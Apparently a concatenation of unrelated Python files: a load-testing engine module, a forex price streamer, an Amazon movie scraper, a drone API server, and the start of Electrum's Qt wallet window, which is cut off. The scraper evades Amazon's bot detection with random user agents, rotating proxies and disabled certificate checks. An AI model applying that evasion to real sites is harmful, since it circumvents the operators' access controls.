assert isinstance(instance, ScenarioExecutor)
self.executors.append(instance)
class FileLister(object):
"""
A mixin to get required files info from executor
"""
@abstractmethod
def resource_files(self):
"""
Get list of resource files
:rtype: list
"""
pass
class ScenarioExecutor(EngineModule):
"""
:type provisioning: engine.Provisioning
:type execution: BetterDict
"""
RAMP_UP = "ramp-up"
HOLD_FOR = "hold-for"
CONCURR = "concurrency"
THRPT = "throughput"
EXEC = "execution"
STEPS = "steps"
LOAD_FMT = namedtuple("LoadSpec", "concurrency throughput ramp_up hold iterations duration steps")
def __init__(self):
super(ScenarioExecutor, self).__init__()
self.env = None
self.provisioning = None
self.execution = BetterDict() # FIXME: why have this field if we have `parameters` from base class?
self.__scenario = None
self.label = None
self.widget = None
self.reader = None
self.delay = None
self.start_time = None
self.preprocess_args = lambda x: None
def _get_tool(self, tool, **kwargs):
env = Environment(self.log, self.env.get())
instance = tool(env=env, log=self.log, http_client=self.engine.get_http_client(), **kwargs)
assert isinstance(instance, RequiredTool)
return instance
def has_results(self):
if self.reader and self.reader.buffer:
return True
else:
return False
def get_script_path(self, required=False, scenario=None):
"""
:type required: bool
:type scenario: Scenario
"""
if scenario is None:
scenario = self.get_scenario()
if required:
exc = TaurusConfigError("You must provide script for %s" % self)
script = scenario.get(Scenario.SCRIPT, exc)
else:
script = scenario.get(Scenario.SCRIPT)
if script:
script = self.engine.find_file(script)
scenario[Scenario.SCRIPT] = script
return script
def get_scenario(self, name=None, cache_scenario=True):
"""
Returns scenario dict, extract if scenario is inlined
:return: DictOfDicts
"""
if name is None and self.__scenario is not None:
return self.__scenario
scenarios = self.engine.config.get("scenarios", force_set=True)
if name is None: # get current scenario
exc = TaurusConfigError("Scenario is not found in execution: %s" % self.execution)
label = self.execution.get('scenario', exc)
is_script = isinstance(label, string_types) and label not in scenarios and \
os.path.exists(self.engine.find_file(label))
if isinstance(label, list):
msg = "Invalid content of scenario, list type instead of dict or string: %s"
raise TaurusConfigError(msg % label)
if isinstance(label, dict) or is_script:
self.log.debug("Extract %s into scenarios" % label)
if isinstance(label, string_types):
scenario = BetterDict.from_dict({Scenario.SCRIPT: label})
else:
scenario = label
path = self.get_script_path(scenario=Scenario(self.engine, scenario))
if path:
label = os.path.basename(path)
if not path or label in scenarios:
hash_str = str(hashlib.md5(to_json(scenario).encode()).hexdigest())
label = 'autogenerated_' + hash_str[-10:]
scenarios[label] = scenario
self.execution['scenario'] = label
self.label = label
else: # get scenario by name
label = name
exc = TaurusConfigError("Scenario '%s' not found in scenarios: %s" % (label, scenarios.keys()))
scenario = scenarios.get(label, exc)
scenario_obj = Scenario(self.engine, scenario)
if name is None and cache_scenario:
self.__scenario = scenario_obj
return scenario_obj
def get_load(self):
"""
Helper method to read load specification
"""
def eval_int(value):
try:
return int(value)
except (ValueError, TypeError):
return value
def eval_float(value):
try:
return int(value)
except (ValueError, TypeError):
return value
prov_type = self.engine.config.get(Provisioning.PROV)
ensure_is_dict(self.execution, ScenarioExecutor.THRPT, prov_type)
throughput = eval_float(self.execution[ScenarioExecutor.THRPT].get(prov_type, 0))
ensure_is_dict(self.execution, ScenarioExecutor.CONCURR, prov_type)
concurrency = eval_int(self.execution[ScenarioExecutor.CONCURR].get(prov_type, 0))
iterations = eval_int(self.execution.get("iterations", None))
ramp_up = self.execution.get(ScenarioExecutor.RAMP_UP, None)
steps = eval_int(self.execution.get(ScenarioExecutor.STEPS, None))
hold = dehumanize_time(self.execution.get(ScenarioExecutor.HOLD_FOR, 0))
if ramp_up is None:
duration = hold
else:
ramp_up = dehumanize_time(ramp_up)
duration = hold + ramp_up
if duration and not iterations:
iterations = 0 # which means infinite
msg = ''
if not isinstance(concurrency, numeric_types + (type(None),)):
msg += "Invalid concurrency value[%s]: %s " % (type(concurrency).__name__, concurrency)
if not isinstance(throughput, numeric_types + (type(None),)):
msg += "Invalid throughput value[%s]: %s " % (type(throughput).__name__, throughput)
if not isinstance(steps, numeric_types + (type(None),)):
msg += "Invalid throughput value[%s]: %s " % (type(steps).__name__, steps)
if not isinstance(iterations, numeric_types + (type(None),)):
msg += "Invalid throughput value[%s]: %s " % (type(iterations).__name__, iterations)
if msg:
raise TaurusConfigError(msg)
return self.LOAD_FMT(concurrency=concurrency, ramp_up=ramp_up, throughput=throughput, hold=hold,
iterations=iterations, duration=duration, steps=steps)
def get_resource_files(self):
files_list = []
if isinstance(self, FileLister):
files_list.extend(self.resource_files())
files_list.extend(self.execution.get("files", []))
return files_list
def __repr__(self):
return "%s/%s" % (self.execution.get("executor", None), self.label if self.label else id(self))
def execute(self, args, cwd=None, stdout=PIPE, stderr=PIPE, stdin=PIPE, shell=False):
self.preprocess_args(args)
return self.engine.start_subprocess(args=args, cwd=cwd, stdout=stdout,
stderr=stderr, stdin=stdin, shell=shell, env=self.env)
class Reporter(EngineModule):
"""
This type of modules is responsible for
in-test and post-test results analysis
"""
REP = "reporting"
def should_run(self):
return self._should_run()
class Service(EngineModule):
"""
This type of modules is responsible for
in-test and post-test results analysis
"""
SERV = "services"
def should_run(self):
return self._should_run()
class Aggregator(EngineModule):
def __init__(self, is_functional):
super(Aggregator, self).__init__()
self.is_functional = is_functional
class Scenario(UserDict, object):
"""
Test scenario entity
"""
SCRIPT = "script"
COOKIES = "cookies"
FIELD_RESP_CODE = "http-code"
FIELD_HEADERS = "headers"
FIELD_BODY = "body"
FIELD_DATA_SOURCES = 'data-sources'
def __init__(self, engine, scenario=None):
super(Scenario, self).__init__()
self.engine = engine
self.data = scenario
def get(self, key, default=defaultdict):
"""
:param key:
:type default: object
:return:
"""
return self.data.get(key, default)
def __getitem__(self, item):
return self.data[item]
def __setitem__(self, key, value):
self.data[key] = value
def __iter__(self):
for item in self.data:
yield item
def __len__(self):
return len(self.data)
def __delitem__(self, key):
return self.data.pop(key)
def get_headers(self):
"""
Returns global headers
:rtype: dict[str,str]
"""
scenario = self
headers = scenario.get("headers", {})
if headers is None:
headers = {}
return headers
def get_requests(self, parser=RequestParser, require_url=True):
"""
Generator object to read requests
:type require_url: bool
:type parser: class
:rtype: list[bzt.requests_model.Request]
"""
requests_parser = parser(self, self.engine)
return requests_parser.extract_requests(require_url=require_url,)
def get_data_sources(self):
data_sources = self.get(self.FIELD_DATA_SOURCES, [])
if not isinstance(data_sources, list):
raise TaurusConfigError("data-sources '%s' is not a list" % data_sources)
for index, _ in enumerate(data_sources):
ensure_is_dict(data_sources, index, "path")
return self.get(self.FIELD_DATA_SOURCES, [])
class HavingInstallableTools(object):
@abstractmethod
def install_required_tools(self):
pass
class Singletone(object):
pass
class SelfDiagnosable(object):
@abstractmethod
def get_error_diagnostics(self):
"""
:rtype: list[str]
"""
pass
|
stream_price_event.py
|
import logging
import queue
import threading
from src.event import TickEvent
from src.pricing.stream import StreamingPrices
logger = logging.getLogger(__name__)
class StreamPriceEvent:
def __init__(self, instruments: list, events: queue.Queue, max_rec: int = None, account: str = 'mt4'):
self.instruments = instruments
self.events = events
self.max_rec = max_rec
self.account = account
def start(self):
sp = StreamingPrices(self.instruments, self.stream_to_queue, max_rec=self.max_rec, account=self.account)
sp.run()
def stream_to_queue(self, price: dict):
if price['type'] == 'PRICE':
tick = TickEvent(price['instrument'], price['time'], price['closeoutBid'], price['closeoutAsk'])
self.events.put(tick)
if __name__ == '__main__':
# For testing
qe = queue.Queue()
spe = StreamPriceEvent(['GBP_USD', 'GBP_AUD', 'EUR_GBP', 'EUR_USD'], qe, 50)
price_thread = threading.Thread(target=spe.start)
price_thread.start()
while True:
try:
event = qe.get()
except qe.empty():
print('nothing in the queue!')
else:
print(f"Event received: {event}")
|
crawler.py
|
"""
Crawl the 25w data again to find the 上映时间,电影名称(含不同版本),导演,演员,类别, comments
"""
import time
import random
import threading
from fake_useragent import UserAgent
from bs4 import BeautifulSoup
import redis
import urllib3
import requests
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
ua = UserAgent()
db = redis.StrictRedis(host='127.0.0.1', port=6379, decode_responses=True)
THREAD_NUM = 50
NUM = 20000
ip_dict = {}
def parser(html, raw_movie_id, proxy):
"""
Check the Sent html
"""
soup = BeautifulSoup(html, 'lxml')
element = soup.find(id='productTitle')
movie = {'id': raw_movie_id}
# Get The Title
if element is None:
element = soup.find('h1', attrs={'class': 'avu-full-width'})
if element is None: # Error
db.sadd('raw_movie_id', raw_movie_id) # put back
print('Robot Detect!!!!!!!!!!!!!!!!!!!!!!')
if proxy in ip_dict:
ip_dict[proxy] += 1
if ip_dict[proxy] > 10:
requests.get('http://127.0.0.1:5010/delete?proxy=' + proxy) # delete proxy
else:
ip_dict[proxy] = 1
return False
else: # Prime Video Page
try:
movie = get_prime_page_info(soup, movie)
except Exception:
pass
else: # Simple Page
try:
movie = get_normal_page_info(soup, movie)
except Exception:
pass
if 'Director' not in html: # A movie must have a director
return False
if 'Fitness' in html: # Not a moive
return False
if 'Music Videos' in html:
return False
if 'Concerts' in html:
return False
if 'title' in movie and 'Season' in movie['title']:
return False
save_movie(movie, raw_movie_id)
return True
def save_movie(movie, movie_id):
"""
Save the moive into redis, judge if the movie is correct before store it into the database
"""
if 'director' in movie and 'actor' in movie and 'title' in movie:
if 'genre' not in movie:
movie['genre'] = None
if 'review' not in movie:
movie['review'] = 0
if 'date' not in movie:
movie['date'] = None
db.hmset('movie: ' + movie_id, movie)
else:
print('Movie ' + movie_id + 'do not have full information!')
print('\n\n')
def get_and_parse(number):
"""
Get raw_movie_id, proxy and html, Send them to the Parser
"""
header = {
'User-Agent': ua.random,
'accept-language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7,zh-TW;q=0.6',
'accept': 'text/html,application/xhtml+xml,application/xml;\
q=0.9,image/webp,image/apng,*/*;q=0.8',
'accept-encoding': 'gzip, deflate, br'
}
raw_movie_id = db.spop('raw_movie_id')
url = 'https://www.amazon.com/dp/' + raw_movie_id
r = requests.get('http://127.0.0.1:5010/get_all/').json()
if not r:
proxy = '127.0.0.1:1087'
else:
proxy = random.choice(r)
try:
proxier = {'https' : 'http://' + proxy}
response = requests.get(url, headers=header, proxies=proxier, timeout=10, verify=False)
except Exception:
db.sadd('raw_movie_id', raw_movie_id)
print('Requests Failure!\n\n')
else:
if response.status_code == 404:
print('Getting ' + url)
print('Number ' + str(number))
print('Page 404' + '\n\n')
elif response.status_code == 200: # get tittle
if parser(response.text, raw_movie_id, proxy):
print('Getting ' + url)
print('Number ' + str(number))
print('Yes!' + '\n\n')
else:
print('Getting ' + url)
print('Number ' + str(number))
print('Nope!' + '\n\n')
else:
print('Getting ' + url)
print('Number ' + str(number))
print('Something Wrong!')
db.sadd('raw_movie_id', raw_movie_id)
print(str(response.status_code) + '\n\n')
def get_normal_page_info(soup, movie):
"""
Get All Info From Normal Pages
"""
for child in soup.find('div', attrs={'class': 'content'}).ul.find_all('li'):
text = child.text.strip()
if 'Actor' in text:
movie['actor'] = [item.strip() for item in text.split(':')[1].split(',')] # actor
elif 'Director' in text:
movie['director'] = [item.strip() for item in text.split(':')[1].split(',')] # director
elif 'Release Date' in text:
movie['date'] = text.split(':')[1].strip() # release date
tmp = soup.find(id='acrCustomerReviewText').text
movie['review'] = int(tmp[0: tmp.find('customer') - 1]) # review number
movie['title'] = soup.find(id='productTitle').text.strip() # movie title
movie['genres'] = soup.find('ul').find_all('li')[-1].span.a.text.strip() # genres
return movie
def get_prime_page_info(soup, movie):
"""
Get All Info From Normal Pages
"""
movie['title'] = soup.find('h1', attrs={'class': 'avu-full-width'}).text.strip() # movie title
tmp = soup.find(id='dp-summary-see-all-reviews').text
movie['review'] = int(tmp[0: tmp.find('customer') - 1]) # review number
movie['date'] = soup.find('span', attrs={'data-automation-id': 'release-year-badge'}).text
for child in soup.find('table').find_all('tr'):
text = child.text.strip()
if 'Genre' in text:
movie['genre'] = [item.strip() for item in text.split('\n')[-1].split(',')] # genre
elif 'Director' in text:
movie['director'] = [item.strip() for item in text.split('\n')[-1].split(',')] # director
elif 'Actor' in text:
movie['actor'] = [item.strip() for item in text.split('\n')[-1].split(',')] # actor
elif 'date' or 'Date' in text:
movie['date'] = [item.strip() for item in text.split('\n')[-1].split(',')] # date
return movie
if __name__ == '__main__':
for i in range(NUM):
while threading.active_count() > THREAD_NUM: # Change
t = 4 * random.random()
if t < 0.5:
t += 1.5
elif t > 3.5:
t -= 2.5
time.sleep(t)
t = threading.Thread(target=get_and_parse, args=(i,))
t.start()
while threading.active_count() > 1: # Wait the thread I created to finish
time.sleep(0.2)
print('------------Finish-----------')
|
__init__.py
|
# std lib imports
import logging
import os
import sys
import signal
import threading
# tornado imports
import tornado.ioloop
from tornado.options import options
# module imports
from modules.base.tornadoql.tornadoql import TornadoQL
# import modules # noqa E402
from modules.api.mavros import MAVROSConnection
from modules.api.status import StatusModule
from modules.api import module_schema
class ApiServer(object):
def __init__(self):
self.exit = False
self.server = None
self.mavros_connection = None
self.mavlink_connection = None
signal.signal(signal.SIGINT, self.exit_gracefully)
signal.signal(signal.SIGTERM, self.exit_gracefully)
def initialize(self):
# setup the connection to ROS
loop = tornado.ioloop.IOLoop.current()
self.mavros_connection = MAVROSConnection(loop, module_schema)
self.mavros_thread = threading.Thread(target=self.mavros_connection.run)
self.mavros_thread.daemon = True
self.mavros_thread.start()
self.status_module = StatusModule(loop, module_schema)
application = TornadoQL()
self.server = tornado.httpserver.HTTPServer(application)
self.server.listen(port=options.server_port, address=options.server_interface)
logging.debug(
"Starting Maverick API server: {0}:{1}/{2}".format(
options.server_interface, options.server_port, options.app_prefix
)
)
def serve(self):
tornado.ioloop.IOLoop.current().start()
# this function blocks at this point until the server
# is asked to exit via request_stop()
logging.debug("Tornado finished")
def request_stop(self):
# TODO: close all websocket connections (required?)
ioloop = tornado.ioloop.IOLoop.current()
ioloop.add_callback(ioloop.stop)
logging.debug("Asked Tornado to exit")
def exit_gracefully(self, signum, frame):
"""called on sigterm"""
self.exit = True
if self.mavros_connection:
self.mavros_connection.shutdown()
if self.mavlink_connection:
self.mavlink_connection.shutdown()
self.request_stop()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget, QToolButton)
import electrum
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest, lnutil)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs,
AddTransactionException, BITCOIN_BIP21_URI_SCHEME)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
CannotDoubleSpendTx, CannotCPFP)
from electrum.version import ELECTRUM_VERSION
from electrum.network import (Network, TxBroadcastError, BestEffortRequestFailed,
UntrustedServerReturnedError, NetworkException)
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum.lnaddr import lndecode, LnDecodeException
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction, PreviewTxDialog
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT,
getOpenFileName, getSaveFileName, BlockingWaitingDialog)
from .util import ButtonsTextEdit, ButtonsLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QToolButton):
# note: this class has a custom stylesheet applied in stylesheet_patcher.py
def __init__(self, icon, tooltip, func):
QToolButton.__init__(self)
self.setText('')
self.setIcon(icon)
self.setToolTip(tooltip)
self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.setAutoRaise(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() in [ Qt.Key_Return, Qt.Key_Enter ]:
self.func()
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
payment_request: Optional[paymentrequest.PaymentRequest]
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
if wallet.has_lightning():
self.wallet.config.set_key('show_channels_tab', True)
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
self.pending_invoice = None
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QWidget()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.show_error_signal.connect(self.show_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress',
'cert_mismatch', 'gossip_db_loaded']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook.maybe_setup(config=self.config,
wallet=self.wallet)
def run_coroutine_from_thread(self, coro, on_result=None):
def task():
try:
f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
r = f.result()
if on_result:
on_result(r)
except Exception as e:
self.logger.exception("exception in coro scheduled via window.wallet")
self.show_error_signal.emit(str(e))
self.wallet.thread.add(task)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'gossip_db_loaded':
self.channels_list.gossip_db_loaded.emit(*args)
elif event == 'channels_updated':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
self.wallet.thread = None
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet: Abstract_Wallet):
